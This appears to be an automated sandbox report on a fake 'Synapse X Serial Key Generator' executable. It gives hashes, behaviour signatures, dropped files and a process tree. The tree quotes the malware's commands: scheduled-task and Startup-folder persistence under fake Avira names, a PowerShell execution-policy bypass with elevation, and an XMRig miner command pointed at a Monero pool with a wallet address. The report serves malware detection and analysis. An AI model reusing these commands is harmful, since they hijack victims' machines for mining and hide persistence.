Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    24-12-2024 21:52

General

  • Target

    Synapse X Serial Key Generator.exe

  • Size

    600KB

  • MD5

    768b21c1c518aa0258ebf0c3af5c5aaa

  • SHA1

    81baff6aae38f8103457d15313166b571623be94

  • SHA256

    54490440082d4db95180097552899a6c178d4bb90bba15390ba668088adf867b

  • SHA512

    f684171d80146123a2eae78af97b4be318167a9ca4ad17e5c8017cb4f51876eb73c98f41791126d27eb170e032dd291bf28f970db7d5c3e8f23c9381f4a4ebe3

  • SSDEEP

    12288:ymkOy/IwEUvC+Q3gwUVN9WCWqsDgpbaN8rO1X3m1PYGapR7pSiha0bKqgqZ6J3N:yfOy0Uq0jiqsEpbVkXgPYFpR7of0bDgl

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Uses the powershell.exe command.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe
    "C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2136
    • C:\Users\Admin\AppData\Local\Temp\is-8C2SJ.tmp\is-AE6KR.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-8C2SJ.tmp\is-AE6KR.tmp" /SL4 $30150 "C:\Users\Admin\AppData\Local\Temp\Synapse X Serial Key Generator.exe" 380631 52224
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1720
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\avirascan.bat""
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2948
        • C:\Windows\SysWOW64\schtasks.exe
          Schtasks.exe /create /F /tn "Avira routine scan" /tr "C:\Program Files (x86)\Avira Antivir\Check for updates.bat" /SC DAILY
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:3020
        • C:\Windows\SysWOW64\xcopy.exe
          xcopy /s /y /k /f "C:\Program Files (x86)\Avira Antivir\Check for updates.bat" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
          4⤵
          • Drops startup file
          • System Location Discovery: System Language Discovery
          • Enumerates system info in registry
          PID:2428
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\check for updates.bat""
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2308
        • C:\Program Files (x86)\Avira Antivir\quiet.exe
          "C:\Program Files (x86)\Avira Antivir\quiet.exe" "C:\Program Files (x86)\Avira Antivir\Updater.bat"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1748
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\Program Files (x86)\Avira Antivir\Updater.bat" "
            5⤵
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2140
            • C:\Windows\SysWOW64\PING.EXE
              PING 127.0.0.1 -n 99
              6⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:2644
            • C:\Windows\SysWOW64\tasklist.exe
              TASKLIST
              6⤵
              • Enumerates processes with tasklist
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2852
            • C:\Windows\SysWOW64\findstr.exe
              FINDSTR /I "Avira_Antivirus.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1008
            • C:\Program Files (x86)\Avira Antivir\svchost.exe
              "C:\Program Files (x86)\Avira Antivir\svchost.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:796
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\27DB.tmp\27DC.tmp\27DD.bat "C:\Program Files (x86)\Avira Antivir\svchost.exe""
                7⤵
                • Loads dropped DLL
                PID:1376
                • C:\Program Files (x86)\Avira Antivir\Avira_Antivirus.exe
                  "C:\Program Files (x86)\Avira Antivir\Avira_Antivirus.exe" -B -t 2 --av=2 -a cryptonight -o stratum+tcp://monero.hashvault.pro:3333 -p x -u 49J1Cj8k5TtErN671Zmn17AanxFGJ2Nfo8iC5NC5BXS8eTxvzm2dgWqASMgJxiDAPxYC4UJK51JnbLTDNdSNNnDEJSwoCvK
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1068
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C ""C:\Program Files (x86)\Avira Antivir\Run_Compatibility_test.bat""
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3052
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Start-Process powershell \"-ExecutionPolicy Bypass -NoProfile -Command `\"cd \`\"C:\Program Files (x86)\Avira Antivir\`\"; & \`\".\Compatibility test.ps1\`\"`\"\" -Verb RunAs"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2696
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "cd \"C:\Program Files (x86)\Avira Antivir\"; & \".\Compatibility test.ps1\""
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2364

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Program Files (x86)\Avira Antivir\Avirascan.bat

    Filesize

    304B

    MD5

    44a6f57b27b11ae80d9c787214b808d6

    SHA1

    28f4ff3c701e136949ebcb617ae0f1a34aa87b04

    SHA256

    85ba142fdf106f20c9581f5db6a7e9276f30507e16cc36fec75eac321dfea04d

    SHA512

    aaa835dd2ae0eb3cb44012ac660ad709323564fe501096d6ede9e031e4f2944396bc412aaa1b3a46f0fa491a6bfef498185b47c93dd3a4e3c24814422d36b33f

  • C:\Program Files (x86)\Avira Antivir\Check for updates.bat

    Filesize

    99B

    MD5

    e98eaf489be68539b1e534fbfb887cd7

    SHA1

    2eed32f0e1d68bdad2c79f8c962a516ca3c42baf

    SHA256

    8c004e9a1781212c0a81706a28cd4868f47c37af08da41120b6992b33122929e

    SHA512

    0efbec60d68a4d5219b1aaec8c66c412f4f4ccc15b89006d7f0da465c284bd67ec575d7b603332c6d8b768179d666ba95154159f874136001d62c4ed4e393bee

  • C:\Program Files (x86)\Avira Antivir\Compatibility test.ps1

    Filesize

    70B

    MD5

    01542a8795f6f1997e33b0bfbea9dd78

    SHA1

    e8f57a9f2793f563670a527b1defc753f09fbac4

    SHA256

    10fbf5b5811b682df16734afd9dccec60581199e7ed0942d76e29b9b174b7b9b

    SHA512

    46234208c315a7e19a7b07bdfb2204d244f68058c7311bb858a656ae1908af32631120b3e26265b981724ee546abe360a017807745d01cfae0fcbec5b77d6138

  • C:\Program Files (x86)\Avira Antivir\Run_Compatibility_test.bat

    Filesize

    207B

    MD5

    b1b5ee8f2b578031841dc89e273224e5

    SHA1

    34c89f703a43f37714e2218ed4ae60122d5a1276

    SHA256

    95c95de40de6af56f8c2317a37e5a6c31833d3e9877e100906c71998aff537bc

    SHA512

    74cc0880a8589ff61d45e1eb6a97106336b548b0bb36c0d46a89bf9a1ce818bae80c727e70c36dc270f13f77795a0d61ae10b4715d1096e8900b2e7775575d53

  • C:\Program Files (x86)\Avira Antivir\Updater.bat

    Filesize

    325B

    MD5

    0781fd3b349ab76c9e7cd5390b293288

    SHA1

    df47190a051b8d09bb68c4f58f162dcddefd2d2f

    SHA256

    9dc67ccbb44a3c707b2161d50edca22e616b5afce08e36e5b998ff7322eae247

    SHA512

    098e3bc28368f033e03911dcea5760ec67e26dd9c5642ccc147ee6e297e07876983ec040794bbb0caa4b50c309b119c50a7be4ab36488904c049757963a6e45b

  • C:\Program Files (x86)\Avira Antivir\quiet.exe

    Filesize

    136KB

    MD5

    935809d393a2bf9f0e886a41ff5b98be

    SHA1

    1ed3fc1669115b309624480e88c924b7b67e73bb

    SHA256

    c92904610319843578ada35fb483d219b0d07da69179d57c7e1223cab078492c

    SHA512

    46bccaaba4b8b4cfa247f48b55998d13b37f714ac69f6b08a97b6b8075f61233545406bc9f8db7d2848f1831eeb506da650b72d7d3a2f624e51eccd5fc537bc5

  • C:\Users\Admin\AppData\Local\Temp\27DB.tmp\27DC.tmp\27DD.bat

    Filesize

    246B

    MD5

    515d11bc1a7e5c32dd84490c21f1a34f

    SHA1

    675de6fe556597590b5987e9cb383ac7fc16204d

    SHA256

    d21c83ee418929ca72c8f8fe0a649f9a78e6ac67cb122826739917cf32feb2ae

    SHA512

    ba69e274e72d6170c9ec7c59afb55b62bed430db5587def5c792b34898b5b09799bfa5fcd48cfff96fc780f207ae5fd3b3d901d1579f99097b0fc316c2813e01

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    c970d1cc767153136b8354e3eb403411

    SHA1

    d1d644a4379d37ff4eed8b85a9dc2bd436f61527

    SHA256

    6ea315ae4fea92c10004177bf3c3852c08b887eb425fe59ca3aa861664c85526

    SHA512

    79c7bd1e37d087faeda9b87c2b48b0d2b85044f2ee3c9a67d917ebe17717814a829961b7936c9a5c3e3f3e4b57e52a192f7520b06e143536aba3db434e5af443

  • \Program Files (x86)\Avira Antivir\Avira_Antivirus.exe

    Filesize

    682KB

    MD5

    3716f0ec45591b01acf1c9289b72b0a4

    SHA1

    041ec74ef4c2acee0ff04e4c69789dd9f8b00c14

    SHA256

    ea6439e39c6ca1ec1e00b7f408dc6c15dd9c7af3bec972bcbfb4371802f443bd

    SHA512

    39d1f9b3ab3cc515d77dcc83700c32863c05e6ad97014b0ecd00d7a8ea2b0767f2e4780c9570b69c69b032657524c06def333a2d3c7f64dcc358b89fdb27c724

  • \Program Files (x86)\Avira Antivir\svchost.exe

    Filesize

    86KB

    MD5

    2eee654c2250c858f6af0f08e65a9241

    SHA1

    879b7f12fd3c80f2a759d44db6c246d83e92977b

    SHA256

    e7286a68156427d2e610e899d4aa3d0e44cdeb00ca710e19298dd7443a3bac48

    SHA512

    6f21e18e8808fd1215e116d782f077193e06cdd0512e6b681cd3c443528e869f88943db89e6973c8a9b12847020dc853249b19b6015cdb7f32fd509d56780879

  • \Users\Admin\AppData\Local\Temp\is-8C2SJ.tmp\is-AE6KR.tmp

    Filesize

    652KB

    MD5

    581bb44526a65c02b388e1b8a83fe86c

    SHA1

    dc387f115977b5fb94d9c9084f33a1c231b50acb

    SHA256

    385a9bb48f5180984867f3bff1d327250d22ab4399137b343be291c370ee3699

    SHA512

    aab4cb6dd5ad4ebfded18748c5cd1a4361c154459f36a4cb49e32855b6866f92d3f065cd9cafa16e621a4216bb176f1554a8bbea7fd458b317eb1ff4c3c2bea1

  • \Users\Admin\AppData\Local\Temp\is-HUA70.tmp\_isetup\_shfoldr.dll

    Filesize

    22KB

    MD5

    92dc6ef532fbb4a5c3201469a5b5eb63

    SHA1

    3e89ff837147c16b4e41c30d6c796374e0b8e62c

    SHA256

    9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

    SHA512

    9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

  • memory/1720-52-0x0000000000400000-0x00000000004B2000-memory.dmp

    Filesize

    712KB

  • memory/1720-16-0x0000000000400000-0x00000000004B2000-memory.dmp

    Filesize

    712KB

  • memory/1748-44-0x0000000000400000-0x000000000042C000-memory.dmp

    Filesize

    176KB

  • memory/2136-54-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2136-3-0x0000000000401000-0x000000000040A000-memory.dmp

    Filesize

    36KB

  • memory/2136-0-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB